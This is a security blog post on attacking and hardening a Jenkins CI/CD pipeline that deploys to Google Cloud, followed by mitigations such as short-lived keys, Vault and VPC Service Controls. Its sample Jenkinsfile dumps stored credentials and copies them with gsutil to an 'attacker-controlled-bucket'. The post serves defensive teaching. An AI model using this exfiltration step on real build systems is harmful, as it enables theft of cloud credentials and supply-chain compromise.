The modern enterprise considers its CI/CD pipeline one of its most critical assets. However, the need to support developers in rapid tool exploration and iteration often drives DevOps teams to keep repository and build controls fairly loose. The great challenge of securing CI/CD lies in the nature of the beast: building arbitrary code with CI/CD scripting tools grants the attacker remote code execution (RCE) from the get-go. In this blog we examine a fairly robust architecture, show how to break it, and discuss how to further harden the design.

Picture this scenario

Our model is a security-conscious enterprise with build services hosted in its datacenter but deployments to the cloud. Initially there may be many developers with commit permissions to the repos and little control over source code or container lineage. Given the recent Docker Hub breach, the security team wants to harden the system against supply chain attacks and to limit the blast radius of a compromised developer token or laptop.

The security team has implemented the following changes:

  • Git hooks are required to prevent accidental credential check-ins for all repositories.
  • Developers are granted wide permissions to create repositories and build in a dedicated dev build project using Cloud Build. Containers are assumed to be malicious but are cordoned off to their own projects or GCP build infrastructure.
  • All commits to repos which can enter stage or dev environments require Dockerfiles with approved lineages (FROM <trusted whitelist>) and the approval of one or more developers to merge.
  • All secrets used in build jobs are managed by the Jenkins administrators. Secrets are passed securely to the administrators, who enter them into the Jenkins credentials manager and permit them to be read only by the repos that require them.
  • Network egress from build agents is locked down, whitelisting only GCP services like Storage and Container Registry.
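The first control above can be sketched as a client-side Git hook. This is a minimal illustration only: the patterns are example regexes, and a real deployment would distribute a dedicated scanner such as git-secrets rather than a hand-rolled script.

```shell
#!/bin/sh
# Sketch of a pre-commit hook (.git/hooks/pre-commit) that blocks commits
# whose staged diff contains likely credentials. The patterns below are
# illustrative, not exhaustive.
PATTERN='AKIA[0-9A-Z]{16}|BEGIN [A-Z ]*PRIVATE KEY|private_key_id'

scan_staged() {
    # Return non-zero if any staged change matches a credential pattern.
    if git diff --cached | grep -qE "$PATTERN"; then
        echo "pre-commit: possible credential in staged changes; commit blocked" >&2
        return 1
    fi
    return 0
}

scan_staged || exit 1
```

Note that client-side hooks are advisory (a developer can skip them with --no-verify), which is why the later controls in the list do not trust the commit contents.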

Taken together, the architecture looks like this:

cloud architecture example

We will now break this.

Jenkinsfile Credentials Attack

Assume an attacker has compromised write permissions to a GitHub repo via the Docker Hub breach or a phishing attack leading to developer laptop compromise. Our attacker wishes to escalate privileges by obtaining credentials stored by the Jenkins server.

Jenkins builds are triggered on commits to feature branches in the source repo, and Jenkins agents run the Jenkinsfile found in the repo. A reviewer is required only on merge requests, not on pushes, so a single Git credential is enough to get code execution on Jenkins. Secrets are managed with the Jenkins credentials manager. Below is a sample Jenkinsfile snippet.

Jenkinsfile (pipeline with credentials management):

    pipeline {
        agent any
        environment {
            CREDENTIALS = credentials('jenkins-gcp-service-account')
        }
        stages {
            stage('Malicious Stage') {
                steps {
                    // Use the credentials to upload to a Storage Bucket,
                    // push to a company-owned gcr.io registry,
                    // or execute a malicious Groovy script.
                    sh '''
                        cat $CREDENTIALS > credentials.txt
                        gsutil cp credentials.txt gs://attacker-controlled-bucket/
                    '''
                }
            }
        }
    }

The attacker is only interested in credentials for staging or production, having deemed the dev environments a dead end. The attacker holds only one Git credential, but the Jenkins credentials manager stores another, used to tag releases and the like. If that credential is not protected and is not a granularly scoped token, the attacker can create the commit with the compromised Jenkins Git credential and approve it with the compromised developer credential.

Allowing developers to design the build pipeline via a Jenkinsfile is a great benefit, but here that convenience is turned against us: the Jenkinsfile is attacker-controlled. The attacker knows that the build infrastructure likely puts artifacts in Storage Buckets, and therefore storage.googleapis.com will be whitelisted even though egress to the internet at large is blocked by network rules. The attacker simply reads the credentials in a Jenkinsfile stage and exports them to their own Storage Bucket.

Mitigation for Jenkinsfile Credentials Attack

The problem here is that the Jenkins credentials manager supplies Jenkins jobs with permanent credentials. Because a Jenkins job is low trust, every job should refresh the token with a short timeout and overwrite the credential. Use a seed job to wrap the Jenkinsfile in a pre-Jenkinsfile step that generates a new service account key and injects only that key into the environment, then delete the key in a post-Jenkinsfile step. With gcloud the key has no expiry, but with the REST API a short expiry can be set as an added protection in case the post step fails to run.

gcloud iam service-accounts keys create ~/key.json \
    --iam-account [SA-NAME]@[PROJECT-ID].iam.gserviceaccount.com
# run Jenkinsfile
gcloud iam service-accounts keys delete [KEY-ID] \
    --iam-account [SA-NAME]@[PROJECT-ID].iam.gserviceaccount.com
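One way to get the short-expiry behavior mentioned above is to skip key files entirely and mint a short-lived access token through the IAM Credentials API. This is a sketch with placeholder names (the jenkins-builder service account and my-project are assumptions); the "lifetime" field bounds how long a leaked token is useful.

```shell
# Mint a short-lived OAuth access token for the build service account
# instead of creating a long-lived key. The token expires after 600s
# regardless of whether any cleanup step runs.
curl -s -X POST \
  -H "Authorization: Bearer $(gcloud auth print-access-token)" \
  -H "Content-Type: application/json" \
  -d '{"scope": ["https://www.googleapis.com/auth/devstorage.read_write"], "lifetime": "600s"}' \
  "https://iamcredentials.googleapis.com/v1/projects/-/serviceAccounts/jenkins-builder@my-project.iam.gserviceaccount.com:generateAccessToken"
```

The caller needs the Service Account Token Creator role on the target account, which keeps the ability to mint build credentials with the seed job rather than with the Jenkinsfile.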

Although this reduces the utility of exporting credentials, the attacker can still use them for the duration of the build step. An even better solution is HashiCorp Vault, which provides full auditing of secret access along with advanced features like dynamic secrets and one-time-use secrets. The goal is to reach a state where the attacker can only use the credentials by causing the build to fail (by blocking re-use of run-specific credentials), thus alerting administrators.
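As a rough sketch of those Vault features, assuming a GCP secrets engine mounted at gcp/ with a roleset named jenkins-build and a static secret at secret/jenkins/deploy-key (all hypothetical names):

```shell
# Dynamic secret: each read mints a fresh, short-lived GCP OAuth token,
# and every read is recorded in Vault's audit log.
vault read gcp/token/jenkins-build

# One-time-use retrieval via response wrapping: the wrapping token can be
# unwrapped exactly once within 60s. If an attacker unwraps it first, the
# build's own unwrap fails, breaking the build and surfacing the theft.
vault kv get -wrap-ttl=60s secret/jenkins/deploy-key
vault unwrap <wrapping_token>
```

The single-use property is what delivers the "use it and the build fails" behavior described above: credential theft becomes loud instead of silent.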

Another way to block exfiltration is to extend Google Private Access to the datacenter. See the link below and my blog on using GCP Service Controls to prevent data exfiltration.
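With VPC Service Controls, the storage.googleapis.com hole in the egress whitelist can be closed by placing the build and artifact projects inside a service perimeter, so Storage and Container Registry calls only succeed against resources inside it. A sketch with placeholder identifiers (project number and policy ID are assumptions):

```shell
# Create a service perimeter around the build project; gsutil cp to a
# bucket outside the perimeter (e.g. an attacker-controlled one) is denied.
gcloud access-context-manager perimeters create jenkins_builds \
    --title="jenkins-builds" \
    --resources=projects/123456789012 \
    --restricted-services=storage.googleapis.com,containerregistry.googleapis.com \
    --policy=987654321
```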

References